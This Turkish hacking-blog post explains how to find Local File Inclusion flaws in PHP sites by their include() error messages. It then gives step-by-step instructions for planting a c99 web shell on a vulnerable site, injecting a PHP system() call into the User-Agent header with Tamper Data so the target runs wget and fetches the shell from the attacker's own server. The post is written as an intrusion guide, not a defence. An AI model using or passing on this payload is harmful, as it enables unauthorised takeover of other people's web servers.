LFI (Local File İnclusion) Açığı Kullanımı


(LFI) Local File İnclusion Açığı Nedir ?


Local File İnclusion (LFİ) Temel Mantığı Hedef Sitenin Veya Serverin İçindeki Dosyaları Bypass Ederek Okumaktır. Bu Açık PHP Yazılım Dilinde Bulunan Bir Açıktır. Sebebi İse Değişkenlerin Atama Hatasından Kaynaklanmaktadır.
Günümüzde İse Yenilenen Scriptler Dolayısıyla Açığın Var Oluşu Neredese Yok Denilecek Kadar Azalmıştır.

LFI Açığı Nasıl Bulunur ?

Belirli Pentesting Programlarıyla Bulunabileceği Gibi Manuel Olarakta Tespit Edilebilmektedir.
Mesela (http://site.com/index.php?id=1) Burası Sadece İd Değil (cat=, home=, url=) Gibi De Olabilir.
Lfi Açığını Tespit Etmek İçin = Sonundaki Sayı Değerini Silelim Şöyle Bir Hata İle Karşılaşırsak Lfi Açığı Var Demektir.


Hata: Warning: include(company_data/.php) [function.include]: failed to open stream: No such file or directory in /usr/home/posting/public_html/resources/index.php on line 171


Bunun Dışında;
 (http://site:com/index.php?page=anasayfa)

Bu Tespitte İse anasayfa Parametresini Değiştirip Örneğin anasayfaasdqwe Yazdığımızda Şöyle Bir Hata İle Karşılaşırsak Açık Var Demektir.

Hata: Warning: include(anasayfaasdqwe.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/site.com/index.php on line 135

Bu Hata Bize Şunun Hakkında Bilgi Veriyor.

page parametresi üzerinden alınan veri, index.php de include ediliyor.

LFİ Açıklı Siteye Shell Sokma

Lfi Açıklı Siteye Shell Sokmak İçin Belirli Programlardan Yardım Alacağız.

Gerekli Programlar

1) Tamper Data (Firefox Eklentisi)

       2) Mozilla Firefox Veya Cyberfox Tarayıcısı

     Tamper Data İçin Tıkla

    Firefox İçin Tıkla


Gerekli Programları Edindikten Sonra Açığı Nasıl İstismar Ederek Shell Sokacağımıza Geçelim.

1) Öncellikle Firefox Tarayıcımızı Açıp Açık Bulduğunuz Siteye Giriyoruz

2) Sitemizi Açtıktan Sonra Tarayıcımızın Üst Kısmında Eklentiler Sekmesi Mevcut. Ona Tıklayıp Tamper Datamızı Açıyoruz.

3) Start Tamper Diyip Sayfamızı Yeniliyoruz. Gelen Uyarıya Tamper Diyoruz.



4) User Agent Yazan Kısma <?system(’wget http://kendisitemiz.com/c99.php -o shell.php’);?>  Yazıp Siteye Shellimizi Upload Ediyoruz.


! Önemli Not !

Siteye Shellimizi Upload Ederken Başka Bir Site Üzerinde Olan Shell İle Upload İşlemi Gerçekleştirilir. Yani Başka Bir Sitede Var Olan Shelli Lfi Açığı Olan Siteye Yansıtır. Bu Şekilde Shell Upload Edilmiş Olur...



 

Yorum Gönder

Daha yeni Daha eski

نموذج الاتصال

Oxygen Chrome
hack forum hack forumu manuel sql injection hacker blog